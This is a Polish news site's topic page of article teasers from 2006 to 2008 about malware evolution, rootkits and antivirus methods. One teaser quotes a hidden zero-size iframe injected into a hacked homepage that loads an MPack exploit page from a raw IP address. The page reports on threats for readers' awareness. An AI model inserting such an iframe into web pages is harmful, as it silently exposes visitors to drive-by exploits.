eGospodarka.pl
eGospodarka.pl poleca

eGospodarka.plTematy › złośliwy kod
  • Rootkity zastępujące MBR dysku

    Rootkity zastępujące MBR dysku

    01:12 18.01.2008

    Laboratorium PandaLabs wykryło nowy sposób przeprowadzania ataków z wykorzystaniem rootkitów. Rootkity ukrywają się, zastępując główny rekord startowy (master boot record - MBR), czyli pierwszy sektor dysku twardego, zmodyfikowaną wersją, która przeprowadza szkodliwe działania. Laboratorium PandaLabs, specjalizujące się w wykrywaniu i analizie ... WIĘCEJ

    Tematy: Rootkity, trojany, złośliwe programy, złośliwy kod
  • Ewolucja złośliwego oprogramowania VII-IX 2007

    Ewolucja złośliwego oprogramowania VII-IX 2007

    10:43 05.12.2007

    ... zawierały one ten sam muteks, ich kod był w ponad 80% identyczny! "Uniwersalny" kod Wydawało się, że natrafiono na uniwersalny kod. Kod ten miał na celu nie ... danych, w której zapisana została konfiguracja trojana. Później, jeden z tych hakerów znalazł kod centrum dowodzenia oraz strukturę bazy danych i wszystko potoczyło się bardzo szybko. Osoby ... WIĘCEJ

    Tematy: złośliwe programy, wirusy, trojany, adware
  • Ochrona antywirusowa: ewolucja i metody

    Ochrona antywirusowa: ewolucja i metody

    12:40 25.11.2007

    ... są określone). Innym przykładem wyższego poziomu jest identyfikowanie szkodliwego kodu na podstawie funkcji API, które wywoływane są niesekwencyjnie przez szkodliwy kod z określonymi parametrami. 3. Systemy ekspertowe W kategorii tej werdykt wydawany jest po złożonej analizie danych. System ekspertowy może zawierać elementy sztucznej inteligencji ... WIĘCEJ

    Tematy: złośliwy kod, złośliwe programy, antywirusy, oprogramowanie antywirusowe
  • Ewolucja złośliwego oprogramowania I-VI 2007

    Ewolucja złośliwego oprogramowania I-VI 2007

    03:33 12.11.2007

    Kaspersky Lab, producent rozwiązań służących do ochrony danych, opublikował swój najnowszy półroczny raport "Kaspersky Security Bulletin, styczeń-czerwiec 2007" poświęcony ewolucji szkodliwego oprogramowania w pierwszej połowie 2007 r. W raporcie Kaspersky Lab, obejmującym pierwszą połowę 2007 roku, zbadano zmiany, jakie zaszły w szkodliwym ... WIĘCEJ

    Tematy: złośliwe programy, wirusy, trojany, adware
  • Ewolucja złośliwego oprogramowania IV-VI 2007

    Ewolucja złośliwego oprogramowania IV-VI 2007

    11:43 13.08.2007

    ... przez trojana. Szczegółowa analiza wykazała, że strona główna zawierała następujący kod: < iframe src="http://81.95.150.42/MPack091cbt/index.php" width=0 height=0 >< /iframe ... takiego jak LdPinch. Następnie do wszystkich podstron tych witryn zostanie dodany "złośliwy" znacznik ramki pływającej, prowadzący do strony z exploitami. Aby dodać znacznik ... WIĘCEJ

    Tematy: złośliwe programy, wirusy, trojany, adware
  • Jak wirusy ukrywają się przed antywirusem?

    Jak wirusy ukrywają się przed antywirusem?

    12:50 06.07.2007

    ... muru, niż aktywny atak. Teraz, gdy firmy antywirusowe analizują nie tylko kod zawarty w szkodliwych programach, ale również ich zachowanie, szkodliwe programy są mniej ... ochrony. Osoba ta, w celu promowania siebie, ogłosi, że kod jest "niewykrywalny". Jak podkreślają specjaliści z Kaspersky Lab, kod ten będzie niewykrywalny jedynie na poziomie jedno ... WIĘCEJ

    Tematy: złośliwe programy, wirusy, trojany, adware
  • Ewolucja złośliwego oprogramowania I-III 2007

    Ewolucja złośliwego oprogramowania I-III 2007

    14:03 17.05.2007

    ... łata nie została wystarczająco przetestowana. Poza tym, pliki kursora podważyły wszystkie zapewnienia o tym, że Vista została napisana od zera, a cały kod wielokrotnie przetestowany i takie błędy były niemożliwe. Microsoft opublikował informacje o nowej luce, która została oznaczona jako CVE-2007-1765 CVE-2007-1765) i podał listę zagrożonych ... WIĘCEJ

    Tematy: złośliwe programy, wirusy, trojany, adware
  • Ewolucja złośliwego oprogramowania 2006

    Ewolucja złośliwego oprogramowania 2006

    00:04 11.03.2007

    ... przyszłe trendy. Złośliwe programy nadal będą wykorzystywały innowacje technologiczne i różne sposoby maskowania swojej obecności w zainfekowanych systemach. Nowe metody polimorficzne, kod "śmieci" oraz technologie rootkit staną się coraz bardziej rozpowszechnione, w końcu będą stanowiły standard dla większości nowych złośliwych programów. Zdaniem ... WIĘCEJ

    Tematy: złośliwe programy, wirusy, trojany, adware
  • Ewolucja złośliwego oprogramowania VII-IX 2006

    Ewolucja złośliwego oprogramowania VII-IX 2006

    00:03 10.12.2006

    ... . Pierwszy etap miał miejsce w latach 90, kiedy wykrywanie na podstawie sygnatur było wystarczające do pokonania prostych wirusów. Na tym etapie złośliwy kod nie był zaawansowany technicznie i nie wykorzystywał złożonych metod infekcji. Początek nowego tysiąclecia przyniósł robaki pocztowe i sieciowe. W celu rozprzestrzeniania się programy ... WIĘCEJ

    Tematy: złośliwe programy, wirusy, trojany, adware
  • Ewolucja złośliwego oprogramowania I-VI 2006

    Ewolucja złośliwego oprogramowania I-VI 2006

    01:23 23.10.2006

    ... złośliwy program jest do pewnego stopnia niewykrywalny na komputerze użytkownika, tj. złośliwy kod ... WIĘCEJ

    Tematy: złośliwe programy, wirusy, trojany, adware

poprzednia  

1 ... 3 4 5 6

następna



Eksperci egospodarka.pl

1 1 1

Wzory dokumentów

Bezpłatne wzory dokumentów i formularzy.
Wyszukaj i pobierz za darmo: